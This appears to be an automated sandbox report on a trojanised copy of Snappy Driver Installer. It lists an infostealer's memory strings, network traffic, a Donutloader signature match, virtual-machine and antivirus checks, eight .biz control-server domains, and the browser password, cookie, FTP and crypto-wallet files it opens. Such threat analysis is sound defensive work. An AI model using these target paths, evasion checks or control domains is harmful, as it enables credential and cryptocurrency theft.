              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropboxstatic.com/static/
              Source: SDIO_R773.exe, 00000000.00000003.1828364146.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828478949.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828082972.0000000004821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: SDIO_R773.exe, 00000000.00000003.1828364146.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828478949.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828082972.0000000004821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptc
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hellofax.com/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hellosign.com/
              Source: SDIO_R773.exe, 00000000.00000003.1970370060.00000000048F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: SDIO_R773.exe, 00000000.00000003.1970370060.00000000048F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: SDIO_R773.exe, 00000000.00000003.1970370060.00000000048F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: SDIO_R773.exe, 00000000.00000003.1970370060.00000000048F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: SDIO_R773.exe, 00000000.00000003.1970370060.00000000048F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.paypal.com/sdk/js
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.co
              Source: SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.4:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49749 version: TLS 1.2

              System Summary

              Source: 00000000.00000002.2064388158.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F860F0_3_047F860F
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F85DE0_3_047F85DE
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F85BD0_3_047F85BD
              Source: SDIO_R773.exeStatic PE information: Resource name: None type: PE32+ executable (console) x86-64, for MS Windows
              Source: SDIO_R773.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: 00000000.00000002.2064388158.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/2@12/4
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile created: C:\Users\user\AppData\Local\Temp\NOUBJXTSUL2YOW34.exeJump to behavior
              Source: SDIO_R773.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\SDIO_R773.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: SDIO_R773.exe, 00000000.00000003.1828826836.000000000480C000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1831331368.00000000047D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: SDIO_R773.exeString found in binary or memory: -save-installed-id%temp%\SDI2\InstalledID.txt-HWIDInstalled:invalid parameter %S
              Source: SDIO_R773.exeString found in binary or memory: Fswww.snappy-driver-installer.orgopenTahomaMS Sans Serif.7zsnp%s\SDIOERROR in redrawmainwnd(): hMain is 0
              Source: SDIO_R773.exeString found in binary or memory: -PATH-install-?Install '%S' '%s'
              Source: SDIO_R773.exeString found in binary or memory: /c rd /s /q "%s"cmd-filtersp-reindex-index_hr-nogui-autoinstall-autoclose-autoupdate-nostop-extractdir:-keepunpackedindex-keeptempfiles-disableinstall-failsafe-delextrainfs-ls:-verbose:-nologfile-nosnapshot-nostamp-getdevicelist:-a:32-a:64-v:-save-installed-id-HWIDInstalled:-cfg:Unknown argument '%S'
              Source: SDIO_R773.exeString found in binary or memory: http://www.snappy-driver-installer.org/downloads/SDIO_Update.torrenthttp://www.snappy-driver-installer.org/downloads/Drivers.torrentupdate\SDIO_Update:
              Source: SDIO_R773.exeString found in binary or memory: -help
              Source: SDIO_R773.exeString found in binary or memory: ?h-helpbabdbtbbbso012bsebspyadaoasuttstxmowixaiaxanuvrstmsfxsemlscrcsisoslpscssccsltsswsscsaseaspdspespfsnhsnlsnisnssnrsncsntsdelstl$Zt&Zt(Zt.Zt1Zt4Zt7Zt
              Source: SDIO_R773.exeString found in binary or memory: Home Page: www.snappy-driver-installer.orgP
              Source: SDIO_R773.exeString found in binary or memory: Home Page: www.snappy-driver-installer.orgP"\
              Source: SDIO_R773.exeString found in binary or memory: // send updates to translations@snappy-driver-installer.org
              Source: SDIO_R773.exeString found in binary or memory: -install <hwid> <inffile>
              Source: SDIO_R773.exeString found in binary or memory: -save-installed-id[:<file>]
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile read: C:\Users\user\Desktop\SDIO_R773.exeJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: newdev.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: devrtl.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeSection loaded: version.dllJump to behavior
              Source: SDIO_R773.exeStatic PE information: certificate valid
              Source: SDIO_R773.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: SDIO_R773.exeStatic file information: File size 5304144 > 1048576
              Source: SDIO_R773.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x31ce00
              Source: SDIO_R773.exeStatic PE information: section name: .eh_fram
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F4143 push eax; retf 0_3_047F4146
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F8A24 push esi; retf 0_3_047F8A27
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F491C push 8FBE3A3Fh; ret 0_3_047F4921
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F48CB pushad ; retf 0_3_047F48DE
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047F80AC push esi; retf 0_3_047F80AF
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047DB9A2 push edx; retf 0_3_047DB9A6
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047E1E9F push ds; retf 0_3_047E1ED2
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047E0199 push esi; iretd 0_3_047E019A
              Source: C:\Users\user\Desktop\SDIO_R773.exeCode function: 0_3_047E328D push eax; retf 0_3_047E328E
              Source: C:\Users\user\Desktop\SDIO_R773.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\SDIO_R773.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\SDIO_R773.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exe TID: 7656Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: Amcache.hve.0.drBinary or memory string: VMware
              Source: Amcache.hve.0.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.0.drBinary or memory string: VMware, Inc.
              Source: Amcache.hve.0.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.0.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.0.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.0.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2066797770.0000000000CCA000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Amcache.hve.0.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.0.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: Amcache.hve.0.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.0.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.0.drBinary or memory string: vmci.sys
              Source: Amcache.hve.0.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
              Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin`
              Source: Amcache.hve.0.drBinary or memory string: \driver\vmci,\driver\pci
              Source: Amcache.hve.0.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.0.drBinary or memory string: VMware20,1
              Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.0.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.0.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.0.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.0.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.0.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.0.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.0.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.0.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.0.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: C:\Users\user\Desktop\SDIO_R773.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              Source: SDIO_R773.exe, 00000000.00000002.2064388158.0000000000C10000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: truculengisau.biz
              Source: SDIO_R773.exe, 00000000.00000002.2064388158.0000000000C10000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: spookycappy.biz
              Source: SDIO_R773.exe, 00000000.00000002.2064388158.0000000000C10000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: punishzement.biz
              Source: SDIO_R773.exe, 00000000.00000002.2064388158.0000000000C10000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: nuttyshopr.biz
              Source: SDIO_R773.exe, 00000000.00000002.2064388158.0000000000C10000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: marketlumpe.biz
              Source: SDIO_R773.exe, 00000000.00000002.2064388158.0000000000C10000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: littlenotii.biz
              Source: SDIO_R773.exe, 00000000.00000002.2064388158.0000000000C10000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: grandiouseziu.biz
              Source: SDIO_R773.exe, 00000000.00000002.2064388158.0000000000C10000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: fraggielek.biz
              Source: C:\Users\user\Desktop\SDIO_R773.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\SDIO_R773.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: Amcache.hve.0.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.0.dr | Binary or memory string: msmpeng.exe
              Source: Amcache.hve.0.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: SDIO_R773.exe, 00000000.00000003.2005093546.00000000047DC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %\Windows Defender\MsMpeng.exe
              Source: Amcache.hve.0.dr | Binary or memory string: MsMpEng.exe
              Source: C:\Users\user\Desktop\SDIO_R773.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: Process Memory Space: SDIO_R773.exe PID: 7528, type: MEMORYSTR
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
              Source: SDIO_R773.exe | String found in binary or memory: Jaxx Liberty
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
              Source: SDIO_R773.exe, 00000000.00000003.2005003653.0000000000D7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3E8Po*
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Ethereum
              Source: SDIO_R773.exe, 00000000.00000003.1985877415.0000000000D74000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: SDIO_R773.exe, 00000000.00000003.1985930366.0000000000D7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Roaming\Binance
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
              Source: C:\Users\user\Desktop\SDIO_R773.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
              Source: C:\Users\user\Desktop\SDIO_R773.exe | Directory queried: C:\Users\user\Documents\DVWHKMNFNN
              Source: Yara match | File source: 00000000.00000003.1985877415.0000000000D74000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
